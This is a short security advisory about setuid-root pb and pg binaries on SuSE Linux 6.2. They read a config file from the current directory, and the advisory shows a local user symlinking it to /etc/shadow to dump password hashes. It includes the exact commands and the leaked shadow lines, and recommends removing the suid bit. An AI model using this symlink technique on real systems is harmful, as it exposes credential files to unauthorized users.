COMMAND

    pb and pg

SYSTEMS AFFECTED

    SuSE Linux 6.2

PROBLEM

    Brock Tellier found following.  /usr/bin/pb and /usr/bin/pg,  suid
    root by default on  SuSE 6.2, allow any  user to read any  file on
    the system as shown:

        susebox:/root # ls -la /usr/bin/pb
        uname -rwsr-xr-x   1 root     root        23544 Jul 22 20:07 /usr/bin/pb

        susebox:/root # strace /usr/bin/pb
        ...
        personality(PER_LINUX)                  = 0
        getpid()                                = 16623
        brk(0)                                  = 0x805032c
        brk(0x80504cc)                          = 0x80504cc
        brk(0x8051000)                          = 0x8051000
        open("pb.conf", O_RDONLY) <-- trouble?  = -1 ENOENT (No such file or directory)
        write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen:  No such file or directory) = 41
        _exit(1)                                = ?
        susebox:/root #

    So,

        xnec@susebox:/tmp > id
        uid=1001(xnec) gid=100(users) groups=100(users)
        xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
        xnec@susebox:/tmp > pb
        Unknown config line :  <root:nfpzNvX19GwRg:10850:0:10000::::>
        <bin:*:8902:0:10000::::>
        Unknown config line :  <daemon:*:8902:0:10000::::>
        <lp:*:9473:0:10000::::>
        Unknown config line :  <news:*:8902:0:10000::::>
        <uucp:*:0:0:10000::::>
        Unknown config line :  <games:*:0:0:10000::::>
        <man:*:8902:0:10000::::>

    ...  etc  for  the  entire  shadow  file   The  same  scenario for
    /usr/bin/pg's  pg.conf  in  your  cwd.   These  two  programs also
    contain numerous buffer overflows and other insecure file i/o  and
    should  obviously  lose  their  suid  bits.   They  cannot operate
    correctly without their  s-bits unless they  are run by  root, but
    no one besides root will run them anyway.  These programs are  not
    worth patching.

SOLUTION

    Remove suid bit and don't even think to use them anymore...